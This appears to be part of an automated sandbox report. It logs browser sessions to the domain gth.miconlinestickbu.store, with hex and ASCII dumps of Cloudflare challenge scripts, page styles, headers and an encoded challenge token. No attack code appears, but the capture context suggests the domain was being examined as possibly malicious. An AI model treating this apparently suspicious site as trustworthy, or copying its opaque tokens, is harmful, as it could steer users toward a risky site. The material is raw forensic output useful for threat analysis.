                                    2024-05-22 15:09:00 UTC1369INData Raw: 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 47 74 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 69 66 28 61 2e 68 61 73 28 6f 29 29 72 65 74 75 72 6e 20 61 2e 67 65 74 28 6f 29 3b 61 2e 73 65 74 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 72 65 74 75 72 6e 20 62 65 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 74 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29
                                    Data Ascii: ion(o){if(o===null||!Gt(o))return o;if(typeof o!="function")throw new TypeError("Super expression must either be null or a function");if(typeof a!="undefined"){if(a.has(o))return a.get(o);a.set(o,c)}function c(){return be(o,arguments,te(this).constructor)
                                    2024-05-22 15:09:00 UTC1369INData Raw: 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 61 3d 7b 6c 6f 61 64 65 64 41 73 79 6e 63 3a 21 31 2c 70 61 72 61 6d 73 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 7d 3b 28 65 2e 61 73 79 6e 63 7c 7c 65 2e 64 65 66 65 72 29 26 26 28 61 2e 6c 6f 61 64 65 64 41 73 79 6e 63 3d 21 30 29 3b 76 61 72 20 72 3d 65 2e 73 72 63 2c 6f 3d 72 2e 73 70 6c 69 74 28 22 3f 22 29 3b 72 65 74 75 72 6e 20 6f 2e 6c 65 6e 67 74 68 3e 31 26 26 28 61 2e 70 61 72 61 6d 73 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 6f 5b 31 5d 29 29 2c 61 7d 66 75 6e 63 74 69 6f 6e 20 44 28 29 7b 72 65 74
                                    Data Ascii: Turnstile script tag, some features may not be available",43777);var a={loadedAsync:!1,params:new URLSearchParams};(e.async||e.defer)&&(a.loadedAsync=!0);var r=e.src,o=r.split("?");return o.length>1&&(a.params=new URLSearchParams(o[1])),a}function D(){ret
                                    2024-05-22 15:09:00 UTC1369INData Raw: 22 2c 68 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74 65 22 2c 68 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 32 30 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 57 69 64 74 68 3d 22 31 70 78 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 43 6f 6c 6f 72 3d 22 23 30 30 30 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 53 74 79 6c 65 3d 22 73 6f 6c 69 64 22 2c 68 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 31 30 70 78 22 2c 68 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 2d 31 32 32 70 78 22 2c 68 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 2d 39 31 70 78 22 2c 68 2e 73 74 79 6c 65 2e 6f 76 65
                                    Data Ascii: ",h.style.position="absolute",h.style.zIndex="21474836420",h.style.borderWidth="1px",h.style.borderColor="#000",h.style.borderStyle="solid",h.style.backgroundColor="#ffffff",h.style.borderRadius="10px",h.style.left="-122px",h.style.top="-91px",h.style.ove
                                    2024-05-22 15:09:00 UTC1369INData Raw: 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 72 6f 6b 65 2d 77 69 64 74 68 22 2c 22 33 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 72 6f 6b 65 22 2c 22 23 66 66 66 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 66 69 6c 6c 22 2c 22 6e 6f 6e 65 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 31 22 2c 22 36 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 32 22 2c 22 31 38 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 31 22 2c 22 31 38 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 32 22 2c 22 35 22 29 2c 6e 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 3b 76 61 72 20 66 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 4e 53 28 22 68 74 74 70 3a 2f 2f 77
                                    Data Ascii: .setAttribute("stroke-width","3"),t.setAttribute("stroke","#fff"),t.setAttribute("fill","none"),t.setAttribute("x1","6"),t.setAttribute("x2","18"),t.setAttribute("y1","18"),t.setAttribute("y2","5"),n.appendChild(t);var f=document.createElementNS("http://w


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    10192.168.2.449778104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:00 UTC880OUTGET /favicon.ico HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "117.0.5938.132"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Referer: https://gth.miconlinestickbu.store/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:00 UTC1280INHTTP/1.1 403 Forbidden
                                    Date: Wed, 22 May 2024 15:09:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 16517
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-05-22 15:09:00 UTC763INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 6e 70 66 53 62 68 58 75 41 41 6b 51 42 33 74 53 76 77 72 55 53 6a 30 2f 73 42 58 44 6e 67 62 6e 6e 72 65 2f 54 62 65 72 32 65 38 6d 5a 43 4c 62 36 61 37 32 6f 39 77 76 62 4b 30 59 61 4e 37 32 6e 45 7a 35 76 65 33 34 61 45 68 55 4f 76 6b 45 4d 43 2f 49 62 38 6d 4d 56 4d 42 43 38 57 57 65 49 72 35 41 35 64 46 52 48 7a 52 79 4e 4b 73 69 50 57 34 4c 6e 71 54 45 66 49 36 51 72 77 78 6a 64 46 65 43 61 5a 71 74 56 4d 43 37 73 34 69 65 63 76 2b 64 78 77 3d 3d 24 66 36 46 67 2b 65 50 37 59 73 33 42 30 77 48 4b 44 56 6f 65 4a 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                    Data Ascii: cf-chl-out: npfSbhXuAAkQB3tSvwrUSj0/sBXDngbnnre/Tber2e8mZCLb6a72o9wvbK0YaN72nEz5ve34aEhUOvkEMC/Ib8mMVMBC8WWeIr5A5dFRHzRyNKsiPW4LnqTEfI6QrwxjdFeCaZqtVMC7s4iecv+dxw==$f6Fg+eP7Ys3B0wHKDVoeJA==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                    2024-05-22 15:09:00 UTC695INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                    2024-05-22 15:09:00 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 62 6f 64 79 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65
                                    Data Ascii: color:#fff}body a:hover{color:#ee730a;text-decoration:underline}body .lds-ring div{border-color:#999 transparent transparent}body .font-red{color:#b20f03}body .pow-button{background-color:#4693ff;color:#1d1d1d}body #challenge-success-text{background-image
                                    2024-05-22 15:09:00 UTC1369INData Raw: 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 63 68 61 6c 6c 65 6e 67 65 2d 72 75 6e 6e 69 6e 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 2e 64 61 72 6b 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 64 61 72 6b 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69
                                    Data Ascii: min-height:100vh}body.no-js .loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring di
                                    2024-05-22 15:09:00 UTC1369INData Raw: 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 62 6f 64 79 2e 6c 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 7b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 3a 68 6f 76 65 72 7b 63 6f
                                    Data Ascii: C41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}body.light{background-color:transparent;color:#313131}body.light a{color:#0051c3}body.light a:hover{co
                                    2024-05-22 15:09:00 UTC1369INData Raw: 78 4e 43 34 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c
                                    Data Ascii: xNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}a{background-col
                                    2024-05-22 15:09:00 UTC1369INData Raw: 42 4d 54 4d 75 4d 44 45 31 49 44 45 7a 4c 6a 41 78 4e 53 41 77 49 44 41 67 4d 43 41 78 4e 69 41 7a 62 54 41 67 4d 6a 52 68 4d 54 45 67 4d 54 45 67 4d 43 41 78 49 44 45 67 4d 54 45 74 4d 54 45 67 4d 54 45 75 4d 44 45 67 4d 54 45 75 4d 44 45 67 4d 43 41 77 49 44 45 74 4d 54 45 67 4d 54 45 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 6d 4d 31 4e 7a 52 68 49 69 42 6b 50 53 4a 4e 4d 54 63 75 4d 44 4d 34 49 44 45 34 4c 6a 59 78 4e 55 67 78 4e 43 34 34 4e 30 77 78 4e 43 34 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a
                                    Data Ascii: BMTMuMDE1IDEzLjAxNSAwIDAgMCAxNiAzbTAgMjRhMTEgMTEgMCAxIDEgMTEtMTEgMTEuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjZmM1NzRhIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLj
                                    2024-05-22 15:09:00 UTC1369INData Raw: 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 66 6f 6f 74 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73
                                    Data Ascii: border-color:#003681;color:#fff;cursor:pointer}.footer{font-size:.75rem;line-height:1.125rem;margin:0 auto;max-width:60rem;width:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";dis
                                    2024-05-22 15:09:00 UTC1369INData Raw: 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 2e 72 74 6c 20 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 32 70 78 7d
                                    Data Ascii: dia screen and (-ms-high-contrast:active),screen and (-ms-high-contrast:none){.main-wrapper,body{display:block}}.rtl .heading-favicon{margin-left:.5rem;margin-right:0}.rtl #challenge-success-text{background-position:100%;padding-left:0;padding-right:42px}
                                    2024-05-22 15:09:00 UTC1369INData Raw: 35 6f 74 55 4d 77 62 58 52 6c 78 54 5f 70 74 65 72 51 56 55 58 52 6d 5a 65 71 41 35 51 50 4d 36 63 77 30 73 48 48 72 49 69 45 78 52 73 41 64 66 41 63 56 64 39 69 68 71 43 7a 4d 73 2e 61 5a 47 37 6f 72 59 33 36 67 77 34 51 58 64 54 6f 67 6f 35 36 6f 6b 61 7a 38 7a 75 6a 77 62 58 4b 54 39 77 5a 52 4c 39 41 65 49 46 49 72 6c 4b 7a 32 30 55 6f 63 59 54 47 65 50 54 37 31 5a 33 39 36 64 6b 6e 4f 4e 74 31 34 41 34 57 48 77 63 4b 56 44 44 65 71 64 6d 68 4e 66 6f 43 39 39 2e 69 57 6d 48 39 4c 43 34 6e 37 6d 48 79 73 42 77 43 2e 35 6a 5a 56 57 54 44 67 31 38 33 36 37 51 4c 68 30 4e 4d 55 59 41 33 35 34 6a 2e 63 74 37 2e 61 30 67 41 35 39 7a 62 46 6e 72 5f 36 74 42 75 6e 50 61 6e 50 67 5f 4b 77 2e 39 4d 42 2e 4f 75 44 32 57 54 5f 6e 6a 30 43 53 52 79 47 46 64 37 30
                                    Data Ascii: 5otUMwbXRlxT_pterQVUXRmZeqA5QPM6cw0sHHrIiExRsAdfAcVd9ihqCzMs.aZG7orY36gw4QXdTogo56okaz8zujwbXKT9wZRL9AeIFIrlKz20UocYTGePT71Z396dknONt14A4WHwcKVDDeqdmhNfoC99.iWmH9LC4n7mHysBwC.5jZVWTDg18367QLh0NMUYA354j.ct7.a0gA59zbFnr_6tBunPanPg_Kw.9MB.OuD2WT_nj0CSRyGFd70


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    11192.168.2.449776104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:00 UTC1089OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/364841505:1716387000:8tvraBwrX2ERNb1OqE2uDzGzv0lTgOfSzC-a3cgAOkk/887db9822f538c41/18215035ea345db HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    Content-Length: 1914
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    Content-type: application/x-www-form-urlencoded
                                    sec-ch-ua-full-version: "117.0.5938.132"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    CF-Challenge: 18215035ea345db
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Origin: https://gth.miconlinestickbu.store
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Referer: https://gth.miconlinestickbu.store/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:00 UTC1914OUTData Raw: 76 5f 38 38 37 64 62 39 38 32 32 66 35 33 38 63 34 31 3d 54 70 24 77 74 77 79 4e 30 35 78 4c 24 62 70 75 32 4c 62 4a 30 37 56 78 57 30 52 77 65 63 30 78 55 75 78 33 30 54 49 62 46 30 6b 5a 30 32 2d 6d 32 55 32 44 78 59 30 6d 42 5a 31 30 65 79 30 66 30 46 75 62 48 38 78 77 4a 44 41 30 65 76 70 30 76 30 67 31 69 53 45 30 30 57 65 30 6f 77 34 6c 6e 30 24 6d 49 30 7a 66 46 75 30 74 72 68 4c 4f 38 49 65 41 58 75 34 52 44 71 31 75 6e 46 35 59 55 77 31 49 71 45 30 31 38 49 30 6a 30 35 74 64 70 77 4e 6c 71 45 48 79 50 4e 4a 6d 50 77 30 46 79 5a 31 6c 79 69 57 65 44 24 44 30 65 55 24 75 6f 30 4e 4c 63 30 62 73 30 6c 70 30 53 77 30 5a 30 68 33 72 62 68 30 69 30 68 70 6c 74 68 7a 64 73 77 34 4a 72 6a 62 6e 30 31 72 41 72 43 42 6e 53 54 69 30 6d 4f 70 39 30 32 6a 6f
                                    Data Ascii: v_887db9822f538c41=Tp$wtwyN05xL$bpu2LbJ07VxW0Rwec0xUux30TIbF0kZ02-m2U2DxY0mBZ10ey0f0FubH8xwJDA0evp0v0g1iSE00We0ow4ln0$mI0zfFu0trhLO8IeAXu4RDq1unF5YUw1IqE018I0j05tdpwNlqEHyPNJmPw0FyZ1lyiWeD$D0eU$uo0NLc0bs0lp0Sw0Z0h3rbh0i0hplthzdsw4Jrjbn01rArCBnSTi0mOp902jo
                                    2024-05-22 15:09:00 UTC667INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:00 GMT
                                    Content-Type: text/plain; charset=UTF-8
                                    Content-Length: 16560
                                    Connection: close
                                    cf-chl-gen: G2mhmhMAsE9+Hlx5DWHgSYLZF9mJNQkp+okb9erLF6vDe9zcuMm0fcHhBD3y4xzp$2nQOkBZ1YwjTndazCCOKPw==
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eF1snGi2mJZHI9ROnj2Y5nhkBf0OoFCDEOcRawSW4NwHjXYcNH95DIqriTGBR1wIfqMVa80rAZRzUeuMleJDkQRIsGv5%2BOnLvBnK3S8V%2BCclbm%2BnTMoA79xawalIzyBiZgVySs4SXbNOKN%2BLZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 887db98f9bae72b3-EWR
                                    alt-svc: h3=":443"; ma=86400
